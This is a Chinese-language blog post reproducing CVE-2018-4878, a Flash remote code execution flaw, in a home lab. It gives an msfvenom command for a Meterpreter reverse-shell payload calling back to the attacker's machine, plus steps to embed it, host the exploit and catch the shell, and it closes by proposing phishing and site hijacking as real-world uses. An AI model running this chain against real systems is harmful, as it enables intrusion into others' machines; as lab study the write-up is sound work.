

r0ckyzzz's Blog.

CVE-2018-4878复现

r0ckyzzz's Blog.

CVE-2018-4878复现

Word count: 353Reading time: 1 min

 2020/02/22   Share

• 
• 
• 
• 
• 

CVE-2018-4878复现

¶前言

2018年2月1号，Adobe官方发布安全通报（APSA18-01），声明Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞（CVE-2018-4878）。
攻击者通过构造特殊的Flash链接，当用户用浏览器/邮件/Office访问此Flash链接时，会被“远程代码执行”，并且直接被getshell。
##复现环境
靶机:win7 sp1
攻击机:kali linux
exp:https://github.com/anbai-inc/CVE-2018-4878
flash版本:Adobe Flash 28.0.0.137

¶流程

靶机里安装flash的流程不再赘述

把exp clone 下来

exp里自带的shellcode是windows弹计算器的payload
我们要把payload替换一下 替换成kali的msf生成的shellcode

msfvenom  -p windows/meterpreter/reverse_tcp lhost=10.211.55.3  lport=4444  -f python >shellcode.txt

替换代码里的shellcode

还有要替换的还有路径

执行python cve-2018-4878.py 即可完成exp的生成

用kali开启apache2服务
并且把index.html和exploit.swf放到/var/www/html/里

用msf监听4444端口

用靶机访问

msf成功收到反弹的shell

¶想法

及时更新flash
此方法可以在社会工程学中得到很好的运用，例如制造一个钓鱼网页批量发给企业员工，如果有一个人没有更新flash player并且点入链接即中招。
黑客劫持了一个大流量的网站也可以用flash player进行抓鸡 ，或者散播蠕虫。

Author：r0ckyzzz

原文链接：http://r0cky.xyz/2020/02/22/CVE-2018-4878%E5%A4%8D%E7%8E%B0/

发表日期：February 22nd 2020, 5:27:11 pm

更新日期：March 5th 2020, 4:35:26 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Vulnhub靶机DC-1通关笔记
• Previous Post
  CISCN Web love_math

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. CVE-2018-4878复现
   1. 1.1. ¶前言
   2. 1.2. ¶流程
   3. 1.3. ¶想法



• Archive
• Tag
• Cate

Total : 37

2021

• 08/02利用captcha_trainer进行验证码识别

2020

• 04/04HTB靶机Jeeves通关笔记
• 04/03HTB靶机Shocker、Blue、Bank通关笔记
• 04/02HTB靶机Lame、Leagcy、Bashed、Popcorn通关笔记
• 03/27Vulnhub靶机LiterallyVulnerable通关笔记
• 03/26Vulnhub靶机SickOS1.1通关笔记
• 03/25# Vulnhub靶机SkyTower通关笔记
• 03/24Vulnhub靶机VulnOS2通关笔记
• 03/24Vulnhub靶机pwnlab_init通关笔记
• 03/23Vulnhub靶机Stapler通关笔记
• 03/22Vulnhub靶机FristiLeaks_1.3通关笔记
• 03/21Vulnhub靶机DeRPnStiNK通关笔记
• 03/21Vulnhub靶机LordOfTheRoot_1.0.1通关笔记
• 03/20Vulnhub靶机W1r3s通关笔记
• 03/19Vulnhub靶机Tr0ll:1通关笔记
• 03/19Vulnhub靶机Wintermute通关笔记
• 03/18Vulnhub靶机Raven2通关笔记
• 03/17Vulnhub靶机Raven1通关笔记
• 03/17Vulnhub靶机Lampiao通关笔记
• 03/16Vulnhub靶机GoldenEye通关笔记
• 03/15Vulnhub靶机DC-9通关笔记
• 03/15Vulnhub靶机DC-8通关笔记
• 03/14Vulnhub靶机DC-7通关笔记
• 03/13Vulnhub靶机DC-6通关笔记
• 03/10Vulnhub靶机DC-5通关笔记
• 03/10Vulnhub靶机DC-4通关笔记
• 03/08Vulnhub靶机DC-3通关笔记
• 03/06Vulnhub靶机DC-2通关笔记
• 03/05Vulnhub靶机DC-1通关笔记
• 02/22局域网DNS劫持
• 02/22Wifi-pumpkin
• 02/22攻防世界Web进阶区部分writeup
• 02/22攻防世界Web进阶区部分writeup 2
• 02/22CISCN Web love_math
• 02/22CVE-2018-4878复现
• 02/22CISCN Web1 Justsoso
• 02/22免杀相关

Security security ctf vulnhub Vulnhub OSCP vulhub Linux环境变量 HTB htb



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

